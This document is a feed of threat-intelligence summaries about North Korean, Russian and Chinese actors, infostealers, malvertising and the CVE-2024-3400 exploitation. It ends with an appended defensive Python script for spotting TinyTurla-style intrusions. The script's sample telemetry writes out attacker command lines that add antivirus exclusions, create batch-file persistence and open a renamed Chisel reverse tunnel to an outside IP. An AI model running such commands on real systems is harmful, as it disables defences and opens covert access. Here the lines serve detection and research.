RiskIQ - cyber risk firms (now microsoft) From Social Engineering to DMARC Abuse: TA427's Art of Information Gathering

#### Targeted Geolocations
- United States
- Korea

#### Targeted Industries
- Non-Government Organization
- Think Tank
- Multi-discipline

## Snapshot

Proofpoint published an article detailing the information gathering tactics that TA427, tracked by Microsoft as Emerald Sleet, employs.

## Description

TA427, a threat actor aligned with North Korea, is known for using sophisticated social engineering tactics and web beacons for reconnaissance. TA427 engages in benign conversation starter campaigns to gather strategic intelligence related to US and South Korean foreign policy initiatives. The threat actor relies heavily on social engineering tactics, including Domain-based Message Authentication, Reporting and Conformance (DMARC) abuse, typosquatting, and private email account spoofing, to impersonate individuals from various verticals such as think tanks, NGOs, and government. Additionally, TA427 uses web beacons for initial reconnaissance to validate active email accounts and gather fundamental information about the recipients' network environments.
TA427 is a persistent and adaptable threat actor, as they are quickly able to stand up new infrastructure and personas. Furthermore, TA427 is identified as one of the most active state-aligned threat actors currently tracked by Proofpoint. The threat actor uses web beacons, tracking beaco

2024-04-17T21:47:14+00:00 https://community.riskiq.com/article/5d36b082 www.secnews.physaphae.fr/article.php?IdArticle=8484384 False Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Unearthing APT44: Russia's Notorious Cyber Sabotage Unit Sandworm

#### Targeted Geolocations
- Ukraine

## Snapshot

Sponsored by Russian military intelligence, APT44 is a dynamic and operationally mature threat actor that is actively engaged in the full spectrum of espionage, attack, and influence operations. **Microsoft tracks this APT as Seashell Blizzard. [Read more about them here.](https://sip.security.microsoft.com/intel-profiles/cf1e406a16835d56cf614430aea3962d7ed99f01ee3d9ee3048078288e5201bb)**

## Description

APT44 is a dynamic and operationally mature threat actor that is actively engaged in the full spectrum of espionage, attack, and influence operations. The group has honed each of these capabilities and sought to integrate them into a unified playbook over time. APT44 has aggressively pursued a multi-pronged effort to help the Russian military gain a wartime advantage and is responsible for nearly all of the disruptive and destructive operations against Ukraine over the past decade. The group presents a persistent, high-severity threat to governments and critical infrastructure operators globally where Russian national interests intersect. APT44 is seen by the Kremlin as a flexible instrument of power capable of servicing Russia's wide-ranging national interests and ambitions, including efforts to undermine democratic processes globally.
The group's support of the Kremlin's political objectives has resulted in some of the largest and mo

2024-04-17T20:31:47+00:00 https://community.riskiq.com/article/24c2a760 www.secnews.physaphae.fr/article.php?IdArticle=8484361 False Threat,Cloud None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)

## Snapshot

On April 10, 2024, Volexity discovered zero-day exploitation of a vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS at one of its network security monitoring (NSM) customers. The vulnerability was confirmed as an OS command injection issue and assigned CVE-2024-3400. The issue is an unauthenticated remote code execution vulnerability with a CVSS base score of 10.0. The threat actor, which Volexity tracks under the alias UTA0218, was able to remotely exploit the firewall device, create a reverse shell, and download further tools onto the device. The attacker focused on exporting configuration data from the devices, and then leveraging it as an entry point to move laterally within the victim organizations. During its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which Volexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests. UTA0218 was observed exploiting firewall devices to successfully deploy malicious payloads. After successfully exploiting devices, UTA0218 downloaded additional tooling from remote servers they controlled in order to facilitate access to victims' internal networks.
They quickly moved laterally thr

2024-04-15T20:31:45+00:00 https://community.riskiq.com/article/958d183b www.secnews.physaphae.fr/article.php?IdArticle=8482982 False Tool,Vulnerability,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Weekly OSINT Highlights, 15 April 2024 2024-04-15T15:15:00+00:00 https://community.riskiq.com/article/c2035b32 www.secnews.physaphae.fr/article.php?IdArticle=8482834 False Ransomware,Spam,Malware,Tool,Threat,Prediction None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) GitHub Exploited in Malware Distribution Campaigns through Search Manipulation

## Snapshot

Checkmarx reports a recent attack campaign where cybercriminals manipulated GitHub's search functionality and used repositories to distribute malware.

## Description

The attackers created repositories with popular names and topics, using techniques like automated updates and fake accounts that added fake stargazers to projects to boost search rankings and deceive users. Malicious code was hidden within Visual Studio project files to evade detection, executing automatically when the project is built. The attackers also padded the executable with many zeros, a technique used to artificially inflate the file size. Checkmarx reports the padded executable file shares similarities with the "Keyzetsu clipper" malware, which targets cryptocurrency wallets. The malware establishes persistence on infected Windows machines by creating a scheduled task that runs the malicious executable daily at 4AM without user confirmation.

## Recommendations

To avoid falling victim to similar attacks, Checkmarx recommends keeping an eye on the following suspicious properties of a repo:

1. Commit frequency: Does the repo have an extraordinary number of commits relative to its age? Are these commits changing the same file with very minor changes?
2. Stargazers: Who is starring this repo? Do most of the stargazers appear to have had accounts created around the same time?

By being aware of these red flags, users can better protect themselves from inadvertently downloading and executing malware.

## References

[https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/#new_tab](https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/#new_tab)

2024-04-12T19:25:21+00:00 https://community.riskiq.com/article/4d0ffb2c www.secnews.physaphae.fr/article.php?IdArticle=8480952 False Malware None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) TA547 Targets German Organizations with Rhadamanthys Stealer

#### Targeted Geolocations
- Germany

## Snapshot

Proofpoint has identified TA547 launching an email campaign targeting German organizations with Rhadamanthys malware, marking the first known use of Rhadamanthys by this threat actor. The campaign involved impersonating a German retail company in emails containing password-protected ZIP files purportedly related to invoices, targeting multiple industries in Germany.

## Description

The ZIP files contained LNK files which, when executed, triggered a PowerShell script that ran a remote script loading Rhadamanthys into memory, avoiding writes to disk. The PowerShell script displayed characteristics suggestive of machine-generated content, potentially from large language models (LLMs). The recent campaign in Germany represents a shift in techniques for TA547, including the use of compressed LNKs and the previously unobserved Rhadamanthys stealer.
The incorporation of suspected LLM-generated content into the attack chain provides insight into how threat actors are leveraging LLM-generated content in malware campaigns, although it did not change the functionality or efficacy of the malware or the way security tools defended against it.

## Recommendations

[Check out Microsoft's write-up on information stealers here.](https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6) [Check out additional OSINT on Rhadamanthys here.](https://sip.security.microsoft.com/intel-explorer/articles/0131b256)

## References

[https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer](https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer)

2024-04-12T18:11:30+00:00 https://community.riskiq.com/article/119bde85 www.secnews.physaphae.fr/article.php?IdArticle=8480922 False Malware,Tool,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Cybercriminal Campaign Spreads Infostealers, Highlighting Risks to Web3 Gaming

## Snapshot

The Insikt Group has uncovered a large-scale Russian-language cybercrime operation that leverages fake Web3 gaming projects to distribute infostealer malware targeting both macOS and Windows users.

## Description

These Web3 games, based on blockchain technology, entice users with the potential for cryptocurrency earnings. The campaign involves creating imitation Web3 gaming projects with minor modifications to appear legitimate, along with fake social media accounts to enhance their credibility. Upon visiting the main webpages of these projects, users are prompted to download malware such as Atomic macOS Stealer (AMOS), Stealc, Rhadamanthys, or RisePro, depending on their operating system.
The threat actors have established a resilient infrastructure and are targeting Web3 gamers, exploiting their potential lack of cyber hygiene in pursuit of financial gain. The malware variants, including AMOS, are capable of infecting both Intel and Apple M1 Macs, indicating a broad vulnerability among users. The primary objective of the campaign appears to be the theft of cryptocurrency wallets, posing a significant risk to financial security. The threat actors' Russian origin is hinted at by artifacts within the HTML code, although their exact location remains uncertain.

## References

[https://www.recordedfuture.com/cybercriminal-campaign-spreads-infostealers-highlighting-risks-to-web3-gaming](https://www.recordedfuture.com/cybercriminal-campaign-spreads-infostealers-highlighting-risks-to-web3-gaming)

2024-04-11T19:26:57+00:00 https://community.riskiq.com/article/0cdc08b5 www.secnews.physaphae.fr/article.php?IdArticle=8480234 False Malware,Vulnerability,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Malvertising Campaigns Hijack Social Media to Spread Stealers Targeting AI Software Users

#### Targeted Geolocations
- Southern Europe
- Northern Europe
- Western Europe
- Eastern Europe

## Snapshot

Bitdefender discusses the increasing use of artificial intelligence (AI) by cybercriminals to conduct malvertising campaigns on social media platforms.

## Description

Threat actors have been impersonating popular AI software such as Midjourney, Sora AI, DALL-E 3, Evoto, and ChatGPT 5 on Facebook to trick users into downloading purported official desktop versions of this AI software. The malicious webpages then download intrusive stealers such as Rilide, Vidar, IceRAT, and Nova Stealer, which harvest sensitive information including credentials, autocomplete data, credit card information, and crypto wallet information.
These malvertising campaigns have targeted European users and have a significant reach through Meta's sponsored ad system. The campaigns are organized by taking over existing Facebook accounts, changing the page's content to appear legitimate, and boosting the page's popularity with engaging content and AI-generated images.

## References

[https://www.bitdefender.com/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/#new_tab](https://www.bitdefender.com/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/#new_tab)

2024-04-10T20:29:45+00:00 https://community.riskiq.com/article/1e1b0868 www.secnews.physaphae.fr/article.php?IdArticle=8479574 False None ChatGPT 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Threat Actors Hack YouTube Channels to Distribute Infostealers (Vidar and LummaC2)

## Snapshot

The AhnLab Security Intelligence Center (ASEC) has identified a concerning trend where threat actors are exploiting YouTube channels to distribute infostealers, specifically Vidar and LummaC2.

## Description

Rather than creating new channels, the attackers are hijacking existing, popular channels with hundreds of thousands of subscribers. The malware is disguised as cracked versions of legitimate software, and the attackers use YouTube's video descriptions and comments to distribute the malicious links. The Vidar malware, for example, is disguised as an installer for Adobe software, and it communicates with its command and control (C&C) server via Telegram and Steam Community. Similarly, LummaC2 is distributed under the guise of cracked commercial software and is designed to steal account credentials and cryptocurrency wallet files. The threat actors' method of infiltrating well-known YouTube channels with a large subscriber base raises concerns about the potential reach and impact of the distributed malware.
The disguised malware is often compressed with password protection to evade detection by security solutions. It is crucial for users to exercise caution when downloading software from unofficial sources and to ensure that their security software is up to date to prevent malware infections.

## References

[https://asec.ahnlab.com/en/63980/](https://asec.ahnlab.com/en/63980/)

2024-04-09T19:48:57+00:00 https://community.riskiq.com/article/e9f5e219 www.secnews.physaphae.fr/article.php?IdArticle=8478894 False Malware,Hack,Threat,Prediction,Commercial None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) ScrubCrypt Deploys VenomRAT with an Arsenal of Plugins

## Snapshot

The article from FortiGuard Labs Threat Research uncovers a recent threat actor's distribution of VenomRAT and other plugins through a phishing email containing malicious Scalable Vector Graphics (SVG) files.

## Description

The email entices victims to click on an attachment, which downloads a ZIP file containing a Batch file obfuscated with the BatCloak tool. Subsequently, ScrubCrypt is used to load the final payload, VenomRAT, while maintaining a connection with a command and control (C2) server to install plugins on victims' environments. The plugin files downloaded from the C2 server include VenomRAT version 6, Remcos, XWorm, NanoCore, and a stealer designed for specific crypto wallets.
## References

[https://www.fortinet.com/blog/threat-research/scrubcrypt-deploys-venomrat-with-arsenal-of-plugins](https://www.fortinet.com/blog/threat-research/scrubcrypt-deploys-venomrat-with-arsenal-of-plugins)

2024-04-08T20:36:41+00:00 https://community.riskiq.com/article/98d69c76 www.secnews.physaphae.fr/article.php?IdArticle=8478320 False Tool,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Weekly OSINT Highlights, 8 April 2024 2024-04-08T15:09:15+00:00 https://community.riskiq.com/article/974639f2 www.secnews.physaphae.fr/article.php?IdArticle=8478203 False Ransomware,Spam,Malware,Tool,Threat,Cloud APT 41 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Phishing Deception - Suspended Domains Reveal Malicious Payload for Latin American Region

#### Targeted Geolocations
- Mexico
- South America
- Central America and the Caribbean
- North America

## Snapshot

Trustwave SpiderLabs has discovered a phishing campaign targeting the Latin American region.

## Description

The phishing email contains a ZIP file attachment that, when extracted, reveals an HTML file that leads to a malicious file download posing as an invoice. The attached HTML file contains a concatenated URL that leads to a suspended page when accessed from a different region. However, if the URL is accessed using a Mexico-based IP, it will redirect to a captcha page for human verification, which leads to another URL that will download a malicious RAR file. The RAR file contains a PowerShell script that will check the victim's machine for information like computer name, operating system, etc. It will also check for the presence of an antivirus product.
Several base64-encoded strings in the script were observed, one of which, when decoded, contains another URL request that uses the 'Post' method for the URL response. The decoded URL will check for the user's country. Another notable base64-encoded string contains a malicious URL that will download a malicious ZIP file.

## References

[https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/phishing-deception-suspended-domains-reveal-malicious-payload-for-latin-american-region/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/phishing-deception-suspended-domains-reveal-malicious-payload-for-latin-american-region/)

2024-04-05T18:15:05+00:00 https://community.riskiq.com/article/abfabfa1 www.secnews.physaphae.fr/article.php?IdArticle=8476654 False None None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Same targets, new playbooks: East Asia threat actors employ unique methods 2024-04-05T13:39:39+00:00 https://community.riskiq.com/article/b4f39b04 www.secnews.physaphae.fr/article.php?IdArticle=8476526 False Malware,Tool,Vulnerability,Threat,Studies,Industrial,Prediction,Technical Guam 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Earth Freybug Uses UNAPIMON for Unhooking Critical APIs

#### Description

Trend Micro analyzed a cyberespionage attack the company has attributed to Earth Freybug, a subset of APT41 (tracked by Microsoft as [Brass Typhoon](https://sip.security.microsoft.com/intel-profiles/f0aaa62bfbaf3739bb92106688e6a00fc05eafc0d4158b0e389b4078112d37c6?)). According to Trend Micro, Earth Freybug has been active since at least 2012, and the Chinese-linked group has been active in espionage and financially motivated attacks. Earth Freybug employs diverse tools like LOLBins and custom malware, targeting organizations globally.
The attack used techniques like dynamic link library (DLL) hijacking and API unhooking to avoid monitoring for a new malware called UNAPIMON. UNAPIMON evades detection by preventing child processes from being monitored. The attack flow involved creating remote scheduled tasks and executing reconnaissance commands to gather system information. Subsequently, a backdoor was launched using DLL side-loading via a service called SessionEnv, which loads a malicious DLL. UNAPIMON, the injected DLL, uses API hooking to evade monitoring and execute malicious commands undetected, showcasing the attackers' sophistication. [Check out Microsoft's write-up on dynamic-link library (DLL) hijacking here.](https://sip.security.microsoft.com/intel-explorer/articles/91be20e8?)

#### Reference URL(s)
1. https://www.trendmicro.com/en_us/research/24/d/earth-freybug.html

#### Publication Date
April 2, 2024

#### Author(s)
Christopher So

2024-04-03T20:46:53+00:00 https://community.riskiq.com/article/327771c8 www.secnews.physaphae.fr/article.php?IdArticle=8475473 False Malware,Tool,Prediction APT 41 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Malware Spotlight: Linodas aka DinodasRAT for Linux

#### Description

Check Point Research has analyzed the latest Linux version (v11) of DinodasRAT, a cross-platform backdoor that was observed in attacks by the Chinese threat actor LuoYu. The malware is more mature than the Windows version, with a set of capabilities tailored specifically for Linux servers. The latest version introduces a separate evasion module to hide any traces of malware in the system by proxying and modifying the system binaries' execution. The malware is installed on Linux servers as a way for the threat actors to gain an additional foothold in the network. DinodasRAT was initially based on the open-source project called SimpleRemoter, a remote access tool based on the Gh0st RAT, but with several additional upgrades.

#### Reference URL(s)
1.
https://research.checkpoint.com/2024/29676/

#### Publication Date
March 31, 2024

#### Author(s)
Check Point Research

2024-04-02T20:33:27+00:00 https://community.riskiq.com/article/57ab8662 www.secnews.physaphae.fr/article.php?IdArticle=8474837 False Malware,Tool,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) "Hey, This Isn't the Right Site!" Distribution of Malware Exploiting Google Ads Tracking
#### Description

AhnLab Security Intelligence Center (ASEC) discovered Rhadamanthys, an information stealer malware, using Google Ads tracking to distribute itself, posing as installers for popular groupware like Notion and Slack. The malware downloads malicious files after installation, often distributed through Inno Setup or NSIS installers. The attackers utilized Google Ads tracking to lead users to a malicious site, taking advantage of the platform's ability to insert external analytic website addresses. Clicking on the ads redirected users to a site tricking them into downloading the malware, ultimately injecting the Rhadamanthys malware into legitimate Windows files for data theft.

> [Check out Microsoft's write-up on Information Stealers here.](https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6?)
> [Check out previous OSINT reporting on Rhadamanthys here.](https://sip.security.microsoft.com/intel-explorer/articles/463afcea)

#### Reference URL(s)
1. https://asec.ahnlab.com/en/63477/

#### Publication Date
March 31, 2024

#### Author(s)
AhnLab Security Intelligence Center
2024-04-01T22:00:49+00:00 https://community.riskiq.com/article/bf8b5bc1 www.secnews.physaphae.fr/article.php?IdArticle=8474308 False Malware None 2.0000000000000000
RiskIQ - cyber risk firms (now microsoft) Rescoms Rides Waves of AceCryptor Spam

#### Description

ESET research shares insights into AceCryptor, one of the most popular and prevalent cryptors-as-a-service (CaaS) in the second half of 2023, with a focus on Rescoms campaigns in European countries. Even though it is well known to security products, AceCryptor's prevalence is not showing indications of decline; on the contrary, the number of attacks significantly increased due to the Rescoms campaigns. The threat actor behind those campaigns in some cases abused compromised accounts to send spam emails in order to make them look as credible as possible. The goal of the spam campaigns was to obtain credentials stored in browsers or email clients, which in the case of a successful compromise would open possibilities for further attacks.

#### Reference URL(s)
1. https://www.welivesecurity.com/en/eset-research/rescoms-rides-waves-acecryptor-spam/

#### Publication Date
March 20, 2024

#### Author(s)
Jakub Kaloč

2024-04-01T20:02:08+00:00 https://community.riskiq.com/article/e3595388 www.secnews.physaphae.fr/article.php?IdArticle=8474239 False Spam,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Weekly OSINT Highlights, 1 April 2024 2024-04-01T13:51:22+00:00 https://community.riskiq.com/article/0bb98406 www.secnews.physaphae.fr/article.php?IdArticle=8474062 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Mobile,Cloud None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) New Go Loader Pushes Rhadamanthys Stealer

#### Description

A new malvertising campaign has been discovered that uses a Go language loader to deploy the Rhadamanthys stealer. The threat actor purchased an ad that appears at the top of Google search results, claiming to be the PuTTY homepage.
The ad URL points to an attacker-controlled domain where they can show a legitimate page to visitors that are not real victims. Real victims coming from the US will be redirected to a fake site that looks and feels exactly like putty.org. The malicious payload is downloaded via a two-step redirection chain, and the server is believed to perform some checks for proxies while also logging the victim's IP address. Upon executing the dropper, there is an IP check for the victim's public IP address. If a match is found, the dropper proceeds to retrieve a follow-up payload from another server. The payload is Rhadamanthys, which is executed by the parent process PuTTy.exe. The loader is closely tied to the malvertising infrastructure, and it is quite likely that the same threat actor is controlling both.

#### Reference URL(s)
1. https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys

#### Publication Date
March 22, 2024

#### Author(s)
Jérôme Segura

2024-03-29T19:00:47+00:00 https://community.riskiq.com/article/e6d270fc www.secnews.physaphae.fr/article.php?IdArticle=8472745 False Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) ShadowRay: First Known Attack Campaign Targeting AI Workloads Actively Exploited in the Wild

#### Description

Analysts from Oligo, an Israeli security research company, have identified an ongoing active attack campaign targeting a critical vulnerability in the Ray open-source AI framework, impacting thousands of companies and servers globally. This vulnerability, known as ShadowRay (CVE-2023-48022), allows attackers to take control of computing resources and leak sensitive data. According to Ray's developer, Anyscale, this issue is not a vulnerability.
Rather, it is an essential feature of Ray's design that enables the execution of dynamic code within a cluster, and Anyscale's position is that Ray is intended to run inside a trusted network environment. Anyscale has therefore not released a patch, and CVE-2023-48022 (recorded as a disputed CVE) does not appear in several vulnerability databases. Since September 2023, malicious actors have accessed thousands of Ray servers across multiple industries, including education, finance, and biopharma. Exploiting this access, actors have stolen sensitive data, credentials and cloud tokens, and used the computing resources for cryptocurrency mining. [Check out Microsoft's write-up on CVE-2023-48022 here.](https://sip.security.microsoft.com/intel-explorer/cves/CVE-2023-48022/description?)
#### Reference URL(s)
1. https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild
#### Publication Date
March 26, 2024
#### Author(s)
Avi Lumelsky, Guy Kaplan, and Gal Elbaz
2024-03-28T20:08:52+00:00 https://community.riskiq.com/article/e4cd5bc2 www.secnews.physaphae.fr/article.php?IdArticle=8472239 False Vulnerability,Cloud None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Android Malware Vultur Expands Its Wingspan
#### Description
The authors behind the Android banking malware Vultur have been spotted adding new technical features that allow the malware operator to interact remotely with the victim's mobile device in more ways. Vultur has also started masking more of its malicious activity by encrypting its C2 communication, using multiple encrypted payloads that are decrypted on the fly, and posing as legitimate applications to carry out its malicious actions.
#### Reference URL(s)
1.
https://research.nccgroup.com/2024/03/28/android-malware-vultur-expands-its-wingspan/
#### Publication Date
March 28, 2024
#### Author(s)
Joshua Kamp
2024-03-28T19:11:03+00:00 https://community.riskiq.com/article/3f7c3599 www.secnews.physaphae.fr/article.php?IdArticle=8472213 False Malware,Mobile,Technical None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Agent Tesla's New Ride: The Rise of a Novel Loader
#### Description
SpiderLabs identified a phishing email on March 8, 2024, with an attached archive containing a Windows executable disguised as a fraudulent bank payment notice. Running it initiated an infection chain culminating in the deployment of Agent Tesla. The loader is compiled with .NET and uses obfuscation and packing techniques to evade detection. It also exhibits polymorphic behaviour, using distinct decryption routines, which makes it difficult for traditional antivirus systems to detect. The loader patches the Antimalware Scan Interface (AMSI) to bypass AMSI-based detection and loads its payloads dynamically in memory, keeping execution stealthy and minimising traces on disk.
> [Check out Microsoft's write-up on Information Stealers here.](https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6)
#### Reference URL(s)
1. https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/agent-teslas-new-ride-the-rise-of-a-novel-loader/
#### Publication Date
March 26, 2024
#### Author(s)
Bernard Bautista
2024-03-27T19:14:21+00:00 https://community.riskiq.com/article/5ffaa8a4 www.secnews.physaphae.fr/article.php?IdArticle=8471583 False Patching None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Sign1 Malware: Analysis, Campaign History & Indicators of Compromise
#### Description
A new malware campaign called Sign1 has been discovered by Sucuri and GoDaddy Infosec. The malware has been found on over 2,500 sites in the past two months. It is injected into WordPress custom HTML widgets that the attackers add to compromised websites, or via the legitimate Simple Custom CSS and JS plugin. The malware is designed to redirect visitors to scam sites. It is time-based and uses dynamic JavaScript code to generate URLs that change every 10 minutes, so a redirect URL captured as an indicator goes stale within minutes. The malware also checks whether the visitor arrived from a major website such as Google, Facebook, Yahoo or Instagram; if the referrer does not match one of these sites, the malware does not execute, a common evasion that hides the redirect from site owners who load their own pages directly.
#### Reference URL(s)
1. https://blog.sucuri.net/2024/03/sign1-malware-analysis-campaign-history-indicators-of-compromise.html
#### Publication Date
March 20, 2024
#### Author(s)
Ben Martin
2024-03-26T19:39:28+00:00 https://community.riskiq.com/article/063f7fac www.secnews.physaphae.fr/article.php?IdArticle=8470965 False Malware Yahoo 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Large-Scale StrelaStealer Campaign in Early 2024
#### Description
StrelaStealer is a malware that targets email clients to steal login data, sending it to the attacker's server for potential further attacks. Since StrelaStealer's emergence in 2022, the threat actor has launched multiple large-scale email campaigns, the most recent of which impacted over 100 organizations across the EU and U.S. Attackers have targeted organizations in a variety of industries, but the high-tech industry has been the biggest target.
Technical analysis of StrelaStealer reveals an evolving infection chain using ZIP attachments, JScript files, and updated DLL payloads, demonstrating the malware's adaptability and the challenge it poses to security analysts and products.
#### Reference URL(s)
1. https://unit42.paloaltonetworks.com/strelastealer-campaign/
#### Publication Date
March 22, 2024
#### Author(s)
Benjamin Chang, Goutam Tripathy, Pranay Kumar Chhaparwal, Anmol Maurya, and Vishwa Thothathri
2024-03-26T17:11:47+00:00 https://community.riskiq.com/article/82785858 www.secnews.physaphae.fr/article.php?IdArticle=8470906 False Malware,Threat,Technical None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Weekly OSINT Highlights, 25 March 2024
2024-03-25T13:28:48+00:00 https://community.riskiq.com/article/95f9e604 www.secnews.physaphae.fr/article.php?IdArticle=8470186 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) New Details on TinyTurla's Post-Compromise Activity Reveal Full Kill Chain
#### Description
Cisco Talos and CERT.NGO have provided updates on an ongoing campaign by the Russian espionage group Turla (tracked by Microsoft as Secret Blizzard), revealing the entire kill chain used by the group, including stealing information and spreading through infected networks. The attackers targeted a European NGO, infecting multiple systems, establishing persistence, and evading antivirus products before deploying their TinyTurla-NG implant for data exfiltration and network pivoting. Turla's post-compromise activities involve configuring antivirus exclusions, setting up persistence through batch files, and deploying TinyTurla-NG and a custom Chisel beacon for reconnaissance and exfiltration. Although the initial compromise dates to October 2023, the majority of the data exfiltration occurred in January 2024, highlighting the patience and stealth of Turla's operations.
> [Check out Microsoft's write-up on Secret Blizzard here.](https://sip.security.microsoft.com/intel-profiles/01d15f655c45c517f52235d63932fb377c319176239426681412afb01bf39dcc?)
#### Reference URL(s)
1. https://blog.talosintelligence.com/tinyturla-full-kill-chain/
#### Publication Date
March 21, 2024
#### Author(s)
Asheer Malhotra, Holger Unterbrink, Vitor Ventura, Arnaud Zobec
2024-03-22T21:01:12+00:00 https://community.riskiq.com/article/bf6723e9 www.secnews.physaphae.fr/article.php?IdArticle=8468727 False None None 2.0000000000000000
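The three post-compromise steps named above (antivirus exclusions, batch-file persistence, a Chisel tunnel) are individually noisy but together are a strong signal. The following is an added example of that correlation, not code from Cisco Talos, CERT.NGO or RiskIQ: it classifies constructed Windows process-creation records (Sysmon event 1 / Security 4688 style fields, invented here) by tactic and flags any host where two or more distinct tactics occur within a time window. The host names, paths, regexes and the 24-hour default window are assumptions; the Chisel pattern keys on chisel's `client <server> R:<remote>` argument shape because the binary is routinely renamed.

```python
"""Correlate Defender-exclusion changes, batch-file persistence and Chisel
tunnelling on one Windows host.

Added example, not code from Cisco Talos, CERT.NGO or the RiskIQ summary.
The records below are constructed to resemble process-creation telemetry
(Sysmon event 1 / Security 4688 style fields); the host names, paths,
patterns and the 24-hour correlation window are assumptions.
"""
import re
from datetime import datetime, timedelta
from typing import NamedTuple


class ProcRecord(NamedTuple):
    ts: datetime
    host: str
    user: str
    image: str     # executable path
    cmdline: str


# One pattern list per tactic named in the report (constructed; extend to taste).
TACTIC_PATTERNS = {
    "defender_exclusion": [
        re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.I),
        re.compile(r"Set-MpPreference\s+-Disable\w*Monitoring", re.I),
    ],
    "batch_persistence": [
        re.compile(r"schtasks(\.exe)?\s.*?/create\s.*?/tr\s+\S*\.bat\b", re.I),
        re.compile(r"reg(\.exe)?\s+add\s+\S*\\CurrentVersion\\Run\b.*\.bat\b", re.I),
    ],
    "chisel_tunnel": [
        # chisel's client syntax: client <server> R:<remote>; the binary is
        # often renamed, so match the arguments rather than the image name.
        re.compile(r"\bclient\s+\S+\s+R:\S+", re.I),
    ],
}


def classify(rec: ProcRecord) -> list[str]:
    """Tactics whose patterns match this record's command line."""
    return [t for t, pats in TACTIC_PATTERNS.items()
            if any(p.search(rec.cmdline) for p in pats)]


def correlate(records, window_hours: int = 24) -> dict[str, list[str]]:
    """Map host -> sorted tactics for hosts where at least two distinct
    tactics occur within `window_hours` of each other. A single exclusion
    change on its own is routine admin work; the combination is the signal."""
    window = timedelta(hours=window_hours)
    per_host: dict[str, list[tuple[datetime, str]]] = {}
    for rec in sorted(records, key=lambda r: r.ts):
        for tactic in classify(rec):
            per_host.setdefault(rec.host, []).append((rec.ts, tactic))
    flagged = {}
    for host, hits in per_host.items():
        tactics = set()
        for i, (ts_i, t_i) in enumerate(hits):
            for ts_j, t_j in hits[i + 1:]:
                if ts_j - ts_i <= window and t_j != t_i:
                    tactics.update((t_i, t_j))
        if len(tactics) >= 2:
            flagged[host] = sorted(tactics)
    return flagged


T0 = datetime(2024, 1, 10, 8, 0)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry.
SAMPLE_RECORDS = [
    ProcRecord(T0, "ws01", "jdoe", PS,
               r"powershell -ep bypass -c Add-MpPreference -ExclusionPath C:\Users\Public\Libraries"),
    ProcRecord(T0 + timedelta(minutes=5), "ws01", "jdoe", r"C:\Windows\System32\schtasks.exe",
               r"schtasks /create /tn Updater /tr C:\Users\Public\Libraries\up.bat /sc onlogon"),
    ProcRecord(T0 + timedelta(minutes=30), "ws01", "jdoe", r"C:\Users\Public\Libraries\svchost.exe",
               "svchost.exe client 198.51.100.23:443 R:socks"),
    # ws07: a lone exclusion added by an admin, no other tactic -> not flagged
    ProcRecord(T0 + timedelta(hours=1), "ws07", "admin", PS,
               r"powershell Add-MpPreference -ExclusionPath C:\Tools"),
    ProcRecord(T0 + timedelta(hours=1, minutes=10), "ws07", "admin",
               r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\admin\notes.txt"),
    # srv02: two tactics, but four days apart -> outside the default window
    ProcRecord(T0 + timedelta(days=1), "srv02", "svc", r"C:\Windows\System32\schtasks.exe",
               r"schtasks /create /tn Sync /tr C:\ProgramData\sync.bat /sc daily"),
    ProcRecord(T0 + timedelta(days=5), "srv02", "svc", r"C:\ProgramData\ch.exe",
               "ch.exe client 198.51.100.23:8080 R:3389:127.0.0.1:3389"),
]

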